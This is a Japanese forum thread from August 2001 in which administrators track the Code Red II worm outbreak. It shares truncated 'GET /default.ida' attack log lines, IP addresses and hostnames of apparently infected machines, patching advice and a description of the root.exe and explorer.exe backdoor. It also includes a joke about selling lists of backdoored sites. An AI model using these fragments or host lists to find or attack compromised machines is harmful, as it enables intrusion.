一応、駆除ソフト配ってるとこ貼っとくか・・・
直リン良くないかもしれんが、コンナ時だからな

http://www.symantec.com/region/jp/news/year01/010801_1.html

311 :名無し:2001/08/05(日) 19:45
>304
改ざん内容がこれですか

sex0r lowd l33tn3ss

sex0r geeklab.org

contact:lowd@geeklab.org


312 :名無しさん@お腹いっぱい。:2001/08/05(日) 19:57
>>310
駆除するもなにも、リブートすれば消えるんでしょ?
リブートさえもしたくないときってこと?

313 :ななし:2001/08/05(日) 19:57
>>311
そうです
IP書いたのはちょっと軽率でした。(反省)

314 :名無しさん@お腹いっぱい。:2001/08/05(日) 20:01
>>313
でも駆除したってパッチ当てなきゃ無意味じゃん。
今日の状況だと再起動したら数分で再感染だぞ。
それにどうせパッチ当てたらリブート要るんじゃないの?

315 :名無しさん@お腹いっぱい。:2001/08/05(日) 20:01
>312

Code Red ワームはメモリ上にのみ存在するので、再起動すると削除されます。
よって、現在のところ解析され確認されている Code Red に関する限り、 今回
の IIS の脆弱性に関する修正パッチを当てて再感染しないようにしてから再起
動すれば復旧できます。

但し、Code Red ワームが感染に利用するのと同じ IIS の脆弱性を利用して サ
ーバの不正操作をするプログラムも存在するため、ワームとは別件で 不正アクセ
スを受けていた可能性も否定できません。 よって、万全を期すならOSのクリー
ンインストールとフルバックアップからのリストアが必要です。

だってさ

316 :名無しさん@お腹いっぱい。:2001/08/05(日) 20:01
Xが現れ始めたのは土曜の夜8時以降・・・
あきらかに時間帯も狙ったな

317 :名無しさん@お腹いっぱい。:2001/08/05(日) 20:02
>>314
ごめん。>>310 の間違いだわ。

318 :名無しさん@お腹いっぱい。:2001/08/05(日) 20:02
>> 312

少なくとも、最初のCodeRed(タイプN)は、
リブートすれば消えます。

CodeRedII(タイプX)については知らない。

もっとも、リブートして消えたって、未対策ならすぐに再感染する
からね。わからなかったら、Server を二度と起動しない事だよね。

319 :なー:2001/08/05(日) 20:04
>>304
亜種の亜種だな。

320 :名無しさん@お腹いっぱい。:2001/08/05(日) 20:06
>>316
週末の間だけ猛烈に繁殖して、月曜の朝には何事も
なかったかのように sleep する。でもバックドアが開いている。
前回のより数倍凶悪だね。

321 :名無しさん@お腹いっぱい。:2001/08/05(日) 20:07
20:02:03から20:03:00の間に、
cj3025086-a.sugnm1.kt.home.ne.jp(210.20.16.232)から
14回アクセス…

322 :名無しさん@お腹いっぱい。:2001/08/05(日) 20:10
Xはリブートしても無駄じゃないかな。
レジストリになんかしてるみたいだし。

323 :名無しさん@お腹いっぱい。:2001/08/05(日) 20:11
うちには、昨日117回、今日これまでに461回いらっしゃってます。
急速に広まってますな。

324 :名無しさん@お腹いっぱい。:2001/08/05(日) 20:12
>>321
1分間に14か・・・凶悪すぎる

325 :名無しさん@お腹いっぱい。:2001/08/05(日) 20:15
>>322
確かに。でも ntbugtraq の分析を信じるなら 24h
以内にリブートすれば被害を免れるか...
やっぱ再インストール推奨。

326 :名無しさん@お腹いっぱい。:2001/08/05(日) 20:26
やっぱりダントツだな
http://www.incidents.org/

327 :名無しさん@お腹いっぱい。:2001/08/05(日) 20:27
Port 13139に一分間で40連続アクセスされた。
これはcode redじゃないのかな?

328 :名無しさん@お腹いっぱい。:2001/08/05(日) 20:44
>>327
ちゃいます。13139 ってのは新手のバックドアだろか?

329 :名無しさん@お腹いっぱい。:2001/08/05(日) 20:48
どさくさにまぎれてノルウェーから80にポートスキャン。
この火事場泥棒!・・・泥棒じゃないか

330 :名無し:2001/08/05(日) 21:04
コードレッド3が出たのかよ。

331 :名無しさん@お腹いっぱい。:2001/08/05(日) 21:13
一見コードレッドに見えるapache向けワームとかあったらちと怖いかも。

332 :ahun:2001/08/05(日) 21:34
バックドアから何かやってみたくなる厨房、、いるよなあ
Code RedUって、
「さあ、遊び場は用意したよ。思う存分遊べ! 責任はとらんけどね、むひひ」
なんて悪魔の誘いっぽくない?

333 :名無しさん@code red:2001/08/05(日) 21:44
飯食いにいってる間にすごい勢いであがってるな・・・
さすが、code red

DNS: KILLER
Node: KILLER

なんてのが今し方来た
結構笑える名前付けてるの多いね
16BITとかPINKPANTHERとかRORIとか
みんなヲタクなんだな(藁

334 ::2001/08/05(日) 21:45
夕方頃に比べて、少しおとなしくなった?

335 :名無しさん@お腹いっぱい。:2001/08/05(日) 21:46
日本からのアタックばっかだよ

ふぅ、ocnだのtikitikiだのzeroだのasahiネットだの

いろんな日本のユーザーからきてるよぉ

aDSLが入って喜んでサーバー開いたのはいいけれども
パッチ当てるって事は知らないのはマジで勘弁してほしい

Apacheにしろよ

336 :名無しさん@お腹いっぱい。:2001/08/05(日) 21:57
>>334
うんにゃ、全然おとろえない。
予想ではこれから徐々に減るのかと思ってた。
考えてみると Code Red II が感染した時点から 24h
の間繁殖し続けて、再感染を防ぐ仕掛けは無いんだから、
パッチ当てない限り永遠に止まらんぞ。

337 :名無しさん@お腹いっぱい。:2001/08/05(日) 21:58
211.167.93.132 - - [05/Aug/2001:19:55:35 +0900] "XX・・・ HTTP/1.0" 400 -


GETじゃない・・・なぜだ・・・
CodeRedIIIなのか??

338 :名無しさん@お腹いっぱい。:2001/08/05(日) 22:01
GETじゃないのとか default.ida宛てじゃないのとか、
リザルトも 400や404や408等いろいろあるでよ

339 :名無しさん@お腹いっぱい。:2001/08/05(日) 22:05
Apacheも 本来は 「パッチだらけの」って意味なんだけどね。

IISでActive-Perlとか入れたりMS式で使うより、
Apache入れてhttpd.confの書き方だけ覚えるほうが
ラクだと思うんだがなあ・・・
Win32用のApacheがわかりにくいところにあるせいかなあ。

340 :あげ:2001/08/05(日) 22:05
かなりの量の亜種があるような気がするのだが・・・
どうなんだろう。

341 :名無しさん@お腹いっぱい。:2001/08/05(日) 22:09
こりゃしばらく続きそうだな。。

342 :名無しさん@お腹いっぱい。:2001/08/05(日) 22:09
もうログ見てらんないほどになってきた・・・・

343 :名無しさん@お腹いっぱい。:2001/08/05(日) 22:24
ほんとにお腹いっぱい >ログ

344 :名無しさん@お腹いっぱい。:2001/08/05(日) 22:36

> http://japan.cnet.com/News/2001/Item/010804-5.html

>Code Redは主に、Windows NTおよびWindows 2000オペレーティング・
>システム(OS)と、マイクロソフトのウェブサーバー・ソフトウェア
>『インターネット・インフォメーション・サーバー』(IIS)を搭載し、
>ネットワークされた企業のコンピューターを攻撃する。

うんうん。

>ダイヤルアップでインターネットに接続している家庭のコンピュー
>ターが感染することはめったにない。

実際は、ダイアルアップ接続でも大量感染してんだYO.

345 :名無しさん@お腹いっぱい。:2001/08/05(日) 22:37
>>339
でもなー、厨房にUNIX系OSは使って欲しくないんだよな。
IISのパッチさえあてられないヤツがまともにUNIXの面倒
なんて見られるわけないし。それこそSPAMの踏み台とか
にされそう。

346 :名無し:2001/08/05(日) 22:39
統一スレッド立ててくれ。
こりゃ緊急対策本部が必要だな。

347 :名無しさん@お腹いっぱい。:2001/08/05(日) 22:39
>>345
まったくっすね。
でも339さんはきっとWin用のApacheをWinに入れよう!とおっしゃってるのでは?

348 :名無しさん@お腹いっぱい。:2001/08/05(日) 22:40

>> 345

たしかに。

でも踏台になるのは、どっちも一緒でしょう :(

BackOrifice だってあるし。

349 :名無しさん@お腹いっぱい。:2001/08/05(日) 22:41
>>344
ほんとに認識が甘すぎる記事ですね。
実際、ダイアルアップマシンからの攻撃のほうが多いっしょ

350 :名無しさん@お腹いっぱい。:2001/08/05(日) 22:41
>>344
> 実際は、ダイアルアップ接続でも大量感染してんだYO.

そうそう、うちもダイアルアップだけど、繋いで10秒もしたら
感染するんだよ。(藁

351 :名無しさん@お腹いっぱい。:2001/08/05(日) 22:43
しかし、ダイアルアップでIIS立ち上げてあるのかねえ。
なんか不思議。

352 :名無しさん@お腹いっぱい。:2001/08/05(日) 22:46
アプリケーションによってはIISをいっしょにインストールするのもあるとか、ないとか。

353 :名無しさん@お腹いっぱい。:2001/08/05(日) 22:59
>>352
あるとすれば、どんなソフト?

354 :名無しさん@お腹いっぱい。:2001/08/05(日) 23:01
code redって凄くないか?
ある意味、今まで最強?

355 :名無しさん@お腹いっぱい。:2001/08/05(日) 23:01
俺ダイアルアップでApacheです。最初はIISの存在自体知らなかった
んでAnHTTPd使ってました。

356 :名無しさん@お腹いっぱい。:2001/08/05(日) 23:04
俺もAnHttpd使ってるけど、大丈夫だよね?

357 :名無しさん@お腹いっぱい。:2001/08/05(日) 23:06
>>356
NT系+IISのみ感染だから大丈夫でしょう。

358 :名無しさん@お腹いっぱい。:2001/08/05(日) 23:07
>>357 +インデックスサービスだよ。

359 :名無しさん@お腹いっぱい。:2001/08/05(日) 23:09
あー、自宅サーバ構築しようと思ってたのにログと 2ch 見てたら
終わってしまった。

360 :ahun:2001/08/05(日) 23:27
今日一日のCode Redのとあるサーバへの来訪回数を一時間を
単位としてエクセルでグラフ化してみてるんだけど(暇
指数近時曲線で依然右肩上がり。。。
どこまで行く気だ。。。

361 :名無しさん@お腹いっぱい。:2001/08/05(日) 23:29
どんどん感染してるんでしょうね。
企業が夏休みだったり、土日休日で。

362 :名無しさん@お腹いっぱい。:2001/08/05(日) 23:33
企業はともかく普通のプロバイダらしい所からのアタックもかなり・・
そんなにサーバ立ててる人多いのか。

363 :名無しさん@お腹いっぱい。:2001/08/05(日) 23:37
>>360
同じ事をやってるけど、家はそんなに増えてないなあ
どちらかというとダイアルアップユーザーが多そう
な時間に上がる。アドレスによって違うのかな?

ちなみに第一オクテット210で夕べの20時から
6 6 9 7 11 8 3 5 6 8 6 8 6 10 8 7 6 9 10 24(15時)
10 12 15(19時) 10 12 19(22時)

それぞれ1時間あたりのXタイプの回数です。

364 :あぼーん:2001/08/05(日) 23:43
www.gachinko.ne.jp - - [05/Aug/2001:05:04:02 +0900] "GET /default.ida?XXXXXXXXXXX

こんな床から来たよ。
そういえばこの手のやつらレンタルサーバーとか追い出されたら
自宅サーバーにするだろな。
今日だけで500以上ノックされてる。

365 :ahun:2001/08/05(日) 23:47
>>363
うちは第一オクテット211です今朝午前一時台から
default.idaへのアクセスをひっかけて集計すると

24(1時) 16(2時) 17 21 11 31 29 23 18 14 16 25 26
19 17 21 26 20 22 57 40 22 50(23時44分まで)

こんな感じでまだ昇り調子です

366 :なー:2001/08/05(日) 23:49
>>364
code redだよ。

367 :名無しさん@お腹いっぱい。:2001/08/05(日) 23:52
しかし、結構IISって使われているんだなあって
変に感心しました。
一時期、企業はWINDOWS系のサーバでサービスしてるとかだと
会社の信用を落とすっていっていたのにな。

368 :名無しさん@お腹いっぱい。:2001/08/05(日) 23:51
どうもIPの前半16ビットがウチと同じ「IPご近所さん」からのものが目立つ。
(211.130.XXX.XXX)
これってほとんどOCNエコノミーだろうから、IISもいっぱいいるんだろう。
211.130.以外のOCNエコノミーからはちょぼちょぼ。
ご近所さんから手を広げて行く段取りになってると考えるのがやっぱ自然かなあ。

フレッツとかCATVとかの人は、IPご近所さんにIISが少ないだろうから
IPご近所さんが多いとは感じにくいんじゃないだろうか。

369 :名無しさん@code red:2001/08/05(日) 23:55
あはは、英会話のECCからきたよ

370 :名無しさん@お腹いっぱい。:2001/08/05(日) 23:56
>>367
http://www.netcraft.com/survey/
IISのShareはApacheの3分の1ですが。。。。それで、これだけ問題になって
いるのが不思議です。
#不思議ではないけど。

371 :名無しさん@お腹いっぱい。:2001/08/05(日) 23:56
>>367
それは大手の話じゃないかな。
100人規模以下の中小じゃUNIXサーバ管理するために専属1人張りつけるのはむずかしいよ。
そういうところではたいていNTのパッケージでの運用が関の山だろう。
それでもまあMSのパッチをあてるくらいのことはしてほしいもんだが、
「IPアドレスって何?」てな担当者しかいないようなネットワークがゴマンとあるのは現実。

372 :197:2001/08/06(月) 00:00
>>200
ありがとうございます♪
そう説明して貰えるとなんとなくわかります。
よくある携帯の伝言ゲームみたいなヤツですね?
とりあえずZone入れてますが、よく来てちょっと怖くなったりしまして。

373 :名無しさん@お腹いっぱい。:2001/08/06(月) 00:04
今は伝言ゲームで済んでても、その内サーバから一般のPC達へ
一斉攻撃とか・・・(;´Д`)?

374 :ahun:2001/08/06(月) 00:04
今日一日のdefault.idaへのアクセス回数:576
ソースアドレスから重複を除いた回数  :459

同じホストがなぜ重複して攻撃してくるのか良く分からん
けど、それにしても僕んとこ(211.XXX.XXX.XXX)だけでも
これだけクラッタ真里子ちゃんがいるんだから、全インターネット
だと、、、くわばらくわばら。。。バックドアで何遊ばれるやら

375 :名無しさん@お腹いっぱい。:2001/08/06(月) 00:06
>>371
別にUNIXだと専属が必要で、WINDWOSだと片手間で
OKって事は、無いんだろうけどそういう宣伝をMSは
してるんで鵜呑みにして導入しちゃうんだろうなあ。

376 : :2001/08/06(月) 00:07
もう”GET /default.ida?XXXXXX・・・”ばっかりだよ。
ときどきNNNNNNが来るとホッとするね。

377 :名無しさん@お腹いっぱい。:2001/08/06(月) 00:08
>>375
売るほうも「NTならできますが、UNIXはうちじゃちょっと」てなとこばっかだよ。
UNIX系で中小企業用パッケージってそうそうないだろ。
NTならいっぱいある。

378 :IIS:2001/08/06(月) 00:10
>>377
そういうベンダーとは付き合わないほうがいいと思われ・

379 :名無しさん@お腹いっぱい。:2001/08/06(月) 00:13
>>378
そういうベンダーは週明け明日の始業時間から
電話鳴りっぱなしなんだだろうなあ。

まあ、実から出た錆ってことで、、、

380 :名無しさん@お腹いっぱい。:2001/08/06(月) 00:13
>>378
ここにいる我々なんかは背景がわかるからそういう判断もできるけど、
ふつうの中小企業では何もわかってないからそういう判断にすらならないと思うよ。
売るほうも売るほうなら、買うほうも買うほう。
何がeコマースだ(藁

381 :名無しさん@お腹いっぱい。:2001/08/06(月) 00:15
『このページは、Microsoft の パーソナル Web サーバー で提供されています。


ってとこからも結構来るな〜。

382 :名無しさん@お腹いっぱい。:2001/08/06(月) 00:15
そもそもはとっても簡単便利そうに見えるパッケージサーバなんかつくってる
メーカ(某日本の電気会社とか)がいちばん悪いと思われ

383 :名無しさん@お腹いっぱい。:2001/08/06(月) 00:16
しかし、アタックにしてもこれだけ来ると、
なんだか嬉しい私はMでしょうか?

これ全部がWWWへの普通のアクセスならほんとに
嬉しいんだけどなあ。

384 :名無しさん@お腹いっぱい。:2001/08/06(月) 00:16
win32のApacheってそんなに導入難しく無かったよ

IISのやり方を探すのに手こづったのでよっぽど楽だった


うーん、win32のApacheも別にセキュリティーには変わりないんですヨね?
ぁあ、ログがどんどんたまってくよ

385 :あぼーん:2001/08/06(月) 00:16
>>374
うちの鯖と回数ほぼ一緒だ。

386 :あぼーん:2001/08/06(月) 00:18
>>383
これは禿同です。
code red出る前はうちのログも2〜3しかなかったもの。

387 :名無しさん@お腹いっぱい。:2001/08/06(月) 00:19
話し戻って、CodeRedのアタックって何時かは収まるのかな?
やられたというかやってる当事者は気づかないんじゃない
のこれ?
接続元のIPSとかに連絡してあげるべきなのかなあ?

388 :名無しさん@お腹いっぱい。:2001/08/06(月) 00:19
せめてコバルトみたいのにしてくれればなあ。

389 :ナナシサソ:2001/08/06(月) 00:21
どうも8月5日からFWログ上ではHTTPへのアクセスが急上昇ですな。
HTTPdなんか立ててないっつーの
9月5日と言えば、カンコックが教科書問題に抗議して一斉にアタックを予告してたが
これの事である可能性はどうよ?

390 :名無しさん@お腹いっぱい。:2001/08/06(月) 00:21
>>387
ISP宛てメール爆弾状態になったりして。

391 :名無しさん@お腹いっぱい。:2001/08/06(月) 00:22
>>388
御意

392 :名無しさん@お腹いっぱい。:2001/08/06(月) 00:22
>>387
最初のうちはwhoisで調べて連絡あげたりしてたんだけど、
こうも増えるともう対処しきれねー(苦笑

393 :なー:2001/08/06(月) 00:22
>>387
ログがパンクしたら気が付くよ。

394 :名無しさん@お腹いっぱい。:2001/08/06(月) 00:23
>>382
結局いちばん悪いのはMS・・・

395 :名無しさん@お腹いっぱい。:2001/08/06(月) 00:25
>>393
ログがパンクしても気づかない鴨・・・

396 :名無しさん@お腹いっぱい。:2001/08/06(月) 00:26
>>390
そうかもね。

まあ、実際問題今のところ回線の誤差程度しかつかってない
し、うちの場合ルータで全部切ってるからほっておいても問題
ないんだけど、、、LOGは一杯になってしまいそう。まあ記念に
残しておくかな。

397 :名無しさん@お腹いっぱい。:2001/08/06(月) 00:27
これってもしかしてウェブ鯖立ってたりすると、カウンター回りまくり?

398 :名無しさん@お腹いっぱい。:2001/08/06(月) 00:28
何ヶ月もRoot宛のメールよんでないとこもあるくらいだからな...

399 :名無しさん@お腹いっぱい。:2001/08/06(月) 00:28
code redと同時にNetbios Nameとりに来たのがあったけど、
これはまた別の新種だろうか。

400 :名無しさん@お腹いっぱい。:2001/08/06(月) 00:28
>>395
LOG消して終わりだったりして、、

401 :名無しさん@お腹いっぱい。:2001/08/06(月) 00:29
>>397 /default.ida がカウンタの CGI ならな (藁

402 :名無しさん@お腹いっぱい。:2001/08/06(月) 00:30
>>396
backdoorありのサイトリストとすれば高く売れる

403 :名無しさん@お腹いっぱい。:2001/08/06(月) 00:31
>>401
 それちょっと面白いな。

404 :名無しさん@お腹いっぱい。:2001/08/06(月) 00:34
>>401
それやったら一気に人気サイトの仲間入りが出来るな。
誰かやって。

405 :名無しさん@お腹いっぱい。:2001/08/06(月) 00:38
うちのサーバーのログみたら、1日に10回以上きている。ほかのマシンも同じぐらい。
というか、攻撃先IPの選定にパターンがあるそうで、パターンにはまると、かなりのリクエストをうけるらしい。
つまり、DoS攻撃受けるようなもんだねぇ。最近そこらじゅうでISPとかでネットワークが落ちまくってるのもCode Redが原因らしい。

406 :名無しさん@お腹いっぱい。:2001/08/06(月) 00:40
なんか下記のようなアドレスからちょくちょくアクセスあるのですが、
これ噂のCode Redなんでしょうか?
厨房な質問で申し訳ないです・・・

210.214.243.38 (TCP Port 2219) [TCP Flags: S]
210.85.136.239 (TCP Port 2041) [TCP Flags: S]
210.101.181.40 (TCP Port 4735) [TCP Flags: S]

ちなみにZoneAlarmで検出されたものです。

407 :名無しさん@お腹いっぱい。:2001/08/06(月) 00:42
code redならport 80でしょ。

408 :名無しさん@お腹いっぱい。:2001/08/06(月) 00:44
>>406
code redにまぎれて厨房がやってきてると思われ。

409 :名無しさん@お腹いっぱい。:2001/08/06(月) 00:46
一日で200件を超えた・・・。
騒ぎに便乗して一つ質問なのですが警告の中で一つだけ毛色の違うものがあったのですけど
User: Administrator
Program: Internet Explorer
Time: 2001/08/06 0:26:14
↑こんなものが警告に出てくるのはなんですか?

410 :名無しさん@お腹いっぱい。:2001/08/06(月) 00:46
皆さんは無事かな?
加入してるプロバイダーにpingも通りません(w
今は多分、運良く書き込めてる
波があるみたいで、また もうじき飲み込まれるよ
こういうプロバイダーは弱者で無能な訳だな

411 :名無しさん@お腹いっぱい。:2001/08/06(月) 00:47
406です。
407さん、408さんありがとうございました。
こういうのはやはり放置しかないんでしょうね・・・

412 :409:2001/08/06(月) 00:51
すみません・・・。
ぞぬスレと勘違いして書き込んでしまいました・・・鬱だ・・・。

413 :厨房:2001/08/06(月) 00:51
61.127.109.53
ここから来たけどここが感染しているってことですか?

414 :名無しさん@お腹いっぱい。:2001/08/06(月) 00:55
>>413
http://whois.nic.ad.jp/cgi-bin/whois_gw

415 :名無しさん@お腹いっぱい。:2001/08/06(月) 00:57
特定のISPだけがトラフィック騰がってるみたいだけど
どういうことなの?
すいません、初心者です。

416 :名無しさん@お腹いっぱい。:2001/08/06(月) 00:57
>>381
パーソナルWebサーバーってida処理するんだっけ?
もし新種がIIS本体の穴くぐってるんだったらまずい
よね。idaつかってるのはただのカモフラージュで・・・

XXXがポイントとか、ってことはないよね。

417 :名無しさん@お腹いっぱい。:2001/08/06(月) 01:00
>>406
ぞぬのそれって相手のポートじゃ・・?

418 :名無しさん@お腹いっぱい。:2001/08/06(月) 01:00
>>415
IISにパッチを当てられないけど、自分はWindowsの管理者だと思っている
厨房userの多いISP> 特定のISP

419 :名無しさん@お腹いっぱい。:2001/08/06(月) 01:00
>>415
IPアドレスはランダムに選ばれるわけではなくて、
感染者のIPの近くのIPを選ぶからじゃない?

420 :名無しさん@お腹いっぱい。:2001/08/06(月) 01:08
も う い い 加 減 に し て 欲 し い

421 :名無しさん@お腹いっぱい。:2001/08/06(月) 01:09
うざくてかなわんよ

422 :名無しさん@お腹いっぱい。:2001/08/06(月) 01:14
げいつ死ねば code red も解決するよ

423 :名無しさん@お腹いっぱい。:2001/08/06(月) 01:15
uranewsってNT系鯖かな?
80叩いてた奴のホスト名逆引きしたら出てきたんだけど・・・
httpd立ち上げてる訳では無いのでcoderedかどうか分からない

424 :名無しさん@お腹いっぱい。:2001/08/06(月) 01:16
>>418
そういう連中の中には、パッチをあてる以前に、そもそもNTに
パッチが効く前提のサービスパック6aを当ててない輩がぞろぞろ
いると思われ。

425 :名無しさん@お腹いっぱい。:2001/08/06(月) 01:19
code redでネットボランチも落ちる、、、
http://www.rtpro.yamaha.co.jp/RT/FAQ/TCPIP/www-server-vulnerability.html

426 :名無しさん@お腹いっぱい。:2001/08/06(月) 01:28
オリジナルのCodeRedの場合、DoS攻撃のターゲットが特定
されていたけど、CodeRedIIの場合はどうなんだろうね。

427 :名無しさん@お腹いっぱい。:2001/08/06(月) 01:33

狙う先は一緒なのです。前回は固定IPで狙ってたけど、
今度はホスト名からIP引いてDOSなんでしょ。

前回はIP変更で逃げたけど、今度は逃げられない。
ホワイトハウスはドメインを捨てるか?

428 :名無しさん@お腹いっぱい。 :2001/08/06(月) 01:36
どうせならマイクロソフトにDoS攻撃するようにしてほしかったな。

429 :名無しさん@お腹いっぱい。:2001/08/06(月) 01:38
アカマイに泣いてもらうに一票。

430 :名無しさん@お腹いっぱい。:2001/08/06(月) 01:41
>>428
ほんとに

431 :名無しさん@お腹いっぱい。:2001/08/06(月) 01:45
>>428
 熱烈賛成

432 :名無しさん@お腹いっぱい。:2001/08/06(月) 01:50
そろそろXは潜伏期に入るか?

433 :名無しさん@お腹いっぱい。:2001/08/06(月) 01:58
>>423
相手がIISかどうかは、baka.htmlとかで404画面出せば判りますよ

逆引きしたらwww.gachinko.ne.jpから来ててIISだった(藁

434 :名無しさん@お腹いっぱい。:2001/08/06(月) 01:58
夕方J-COM群馬に感染者一覧をログ添付して
メールしといたのに、返事来てない。まさかみんな
休んでんの?まさかね。

435 :ahun:2001/08/06(月) 01:59
NANOGに流れてきた投稿だと、今回のX形はDoS Flooding能力は無いらしいっす。
ただバックドアを仕掛けていくだけ。後はそれを使って誰が何をやるか?
ってことかな

436 :名無しさん@お腹いっぱい。:2001/08/06(月) 01:59
>>423
この板でも http://www.uranews.com/articles/tools/utoolc.gif
引っ張ってくるのに時間かかってるのが気になるね。

437 :名無しさん@お腹いっぱい。:2001/08/06(月) 02:01
うちはアクセス全然無くなった。潜伏?

438 :名無しさん@お腹いっぱい。:2001/08/06(月) 02:02
>>435
 しかし、ワームを仕掛けたやつはどうやって仕掛けられたところを
 知るのかな。そのへんの仕掛けもあるんだろうか。

439 :名無しさん@お腹いっぱい。:2001/08/06(月) 02:02
潜伏期までまだ3週間

440 :名無しさん@お腹いっぱい。:2001/08/06(月) 02:03
>>439
いや、Xの話

441 :名無しさん@お腹いっぱい。:2001/08/06(月) 02:04
Xの潜伏期

442 :名無しさん@お腹いっぱい。:2001/08/06(月) 02:08
Xは土日活動してスリープするんじゃないの?

443 :名無しさん@お腹いっぱい。:2001/08/06(月) 02:13
ウチはまだXごんごん来てる。この10分で20件。
ひとつ発見。いつのまにか、全て 「211.X.X.X」だけになった。

Nはこなくなった。最後に来たのが5日21:24。

444 :名無しさん@お腹いっぱい。:2001/08/06(月) 02:17
>>443
そうか、ごんごん来てるか。

>211
インクリメントしたのかな(w

445 :名無しさん@お腹いっぱい。:2001/08/06(月) 02:19
>>428
 2chにスレを立てるCode Red改とか..

446 :名無しさん@お腹いっぱい。:2001/08/06(月) 02:19
a163-159.dialup.iol.cz - - [06/Aug/2001:02:04:43 +0900] "GET /default.ida?NNN
十分前に来た。

Xが土日だけ活動するという情報のソースは?

447 :名無しさん@お腹いっぱい。:2001/08/06(月) 02:20
うちは61.*.*.*だけど、全て61.*.*.*からになったよ
odn.ad.jp、hkcable.com.hk、HINET-IP.hinet.netとか

448 :名無しさん@お腹いっぱい。:2001/08/06(月) 02:20
ソースっつーか、ただの噂だけど

>>298

449 :名無しさん@お腹いっぱい。:2001/08/06(月) 02:22
広島、佐賀、沖縄、横浜、大阪、東京・・
色んなとこの同じISPから来たよ・・

450 :名無しさん@お腹いっぱい。:2001/08/06(月) 02:26
IP を見る限り PPP で繋いでる奴多いから土日のテレホタイムが
活発に見えるだけだろう。

451 :名無しさん@お腹いっぱい。:2001/08/06(月) 02:26
>>449
何処よ?

452 :名無しさん@お腹いっぱい。:2001/08/06(月) 02:26
いまさらで悪いが、
なんか蚊取り線香の名前みたいだな。

453 :名無しさん@お腹いっぱい。:2001/08/06(月) 02:28
>>450
それはあなたもPPPで繋いでるテレホの人だからなのでは?

454 :名無しさん@お腹いっぱい。:2001/08/06(月) 02:29
>>450
いや、そんなことは無いぞ

455 :名無しさん@お腹いっぱい。:2001/08/06(月) 02:29
うちは61.xxxxだけど、
NNNに関しては、色々なIPから来る。(規則性は無い。)
XXXはほとんどが61.xxxから来るが、1例だけ198.142から来ていた。
つまり、
XXX (1) 同じNetworkを狙う
XXX (2) 違うNetworkに飛ぶ
XXX (3) 同じNetworkを狙う。 リクエストメソッド無し
の3種類があるような気がする。

456 :名無しさん@お腹いっぱい。:2001/08/06(月) 02:32
>>167
>>254
>>256
>>258
>>259

Xのタイプについてはここら辺参照

457 :名無しさん@お腹いっぱい。:2001/08/06(月) 02:38
うっ、アクセスなくなったかと思ったらやっぱりまだ来るな

458 :298:2001/08/06(月) 02:39
>>446
噂じゃなくて詳細な分析出た
http://www.eeye.com/html/advisories/coderedII.zip
http://www.securityfocus.com/templates/archive.pike?list=1&mid=201886

459 :名無しさん@お腹いっぱい。:2001/08/06(月) 02:41
>>458
おお、明日は会社で分析しよっと

460 :名無しさん@お腹いっぱい。:2001/08/06(月) 02:42
じゃあ潜伏するのはあと何時間か先か

461 :名無しさん@お腹いっぱい。:2001/08/06(月) 02:48
>>456
それ書いたの大体俺だけど、Cache-Control: max-stale=0
付きの奴は今日はまったく来なかったよ。

462 :名無しさん@お腹いっぱい。:2001/08/06(月) 02:50
おっ、298ありがと

463 :名無しさん@お腹いっぱい。:2001/08/06(月) 03:04
>>458 をざっと読んでみた。
感染したら一日(中国語版は二日)sleepするみたいだね。
あと、マシンを再起動してもバックドアと、explorer.exeにしかけ
られたトローイは残ると書いてあるようだ。

464 :名無しさん@お腹いっぱい。:2001/08/06(月) 03:15
バックドアだけじゃなくトロイまで・・・
どんなことするトロイなんだろ

465 :名無しさん@お腹いっぱい。:2001/08/06(月) 03:25
なるほど、Explorerのトロイがある限り、root.exeを削除したり、
パッチを単に当てるだけじゃダメってことかな

466 :463:2001/08/06(月) 03:26
>>464
う、すまん。読み違えたようだ。
感染すると /scripts/root.exe と、cドライブまたはdドライブのルートに
explorer.exe が作られて、この root.exe と explorer.exe でバックドア
を実現しているようだ。
Worm自体はオリジナルと同様にメモリ上にしか存在しないから、再起動
すればWormは消える。しかし、root.exe と explorer.exe は残っているの
でバックドアは残ったまま、ということらしい。

root.exe と ルートディレクトリにある explorer.exe を消して再起動すれば、
バックドアを消すことができるようだ。パッチを当てない限り再感染はする
けど。

467 :名無し:2001/08/06(月) 05:37
静まったのか?
誰も書き込みしなくなった。

468 :感染しました。:2001/08/06(月) 05:40
こんなメールが来た。

2001年8月5日
お客様

                株式会社 エヌ・ティ・ティエムイー
                    WAKWAKヘルプデスク

      セキュリティに関するご連絡

 いつもWAKWAKをご利用頂きまして、誠にありがとうございます。
 本メールはセキュリティに関するご連絡です。必ず御一読頂きます様
お願い致します。
 ARIS Analyzer Service (Attack Registry and Intelligence Service)
という機関より、お客様の端末がCode Red Wormというワームに感染し
ているという連絡がございました。
 このワームはWindows NT IISのセキュリティホールへ危害を加えるワ
ームであるということです。このワームの情報につきましては下記UR
Lをご参照下さい。

 http://aris.securityfocus.com/alerts/codered
 http://www.trendmicro.co.jp/virusinfo/codered_a.htm

 一度、お客様の端末の確認、およびパッチファイルのダウンロード等
をお願い致します。
 詳細につきましては文末に添付致しましたARIS様からのメールをご覧
下さい。なお、大変申し訳ございませんがこの件につきましては、WA
KWAKではご質問等を頂いてもお答え致しかねますのでご了承下さい。
以下がARIS様のホームページになります。

 http://aris.securityfocus.com

 今後ともWAKWAKをよろしくお願い申し上げます。


                    WAKWAKヘルプデスク
                           担当:井上
                        TEL:0120-309-092
                        FAX:03-5675-7022
                       support@wakwak.com
   月〜金 土日祝・年末年始
 お問合せ・申込み  9:00〜19:00 お休み
 技術サポート 9:00〜21:00 10:00〜17:30

469 :名無しさん@お腹いっぱい。:2001/08/06(月) 05:43
>>467 飽きただけでは?
まだ 10 分に一回のペースでアクセスがあるし。

470 :感染しました。:2001/08/06(月) 05:43

ARIS Analyzer Service ってなんなんでしょうか?

471 :名無しさん@お腹いっぱい。:2001/08/06(月) 07:00
鎮静化するまでどれぐらいかかるものかねェ。

472 :名無しさん@お腹いっぱい。:2001/08/06(月) 07:10
>>452
アースレッドは部屋ごと殺虫スプレーだぞ。

473 :名無しさん@お腹いっぱい。:2001/08/06(月) 07:15
>>471
どうだろうねぇ。ダイヤルアップマシンで無防備にサーバ立ててる
厨房がいなくならない限りはナカナカ・・・

ちなみに Code Red II の活動期限は2001年9月末らしい。
http://www.securityfocus.com/archive/1/201886
> The propagation mechanism is the most novel aspect of this particular
> worm. Here are the steps performed:
>
> * Check local time. If it is less than the year 2002 and is also less than
> the 10th month, then continue. Otherwise, reboot. This should limit the
> worm to the end of September, 2001 if it lives that long.

474 :名無しさん@お腹いっぱい。:2001/08/06(月) 07:28
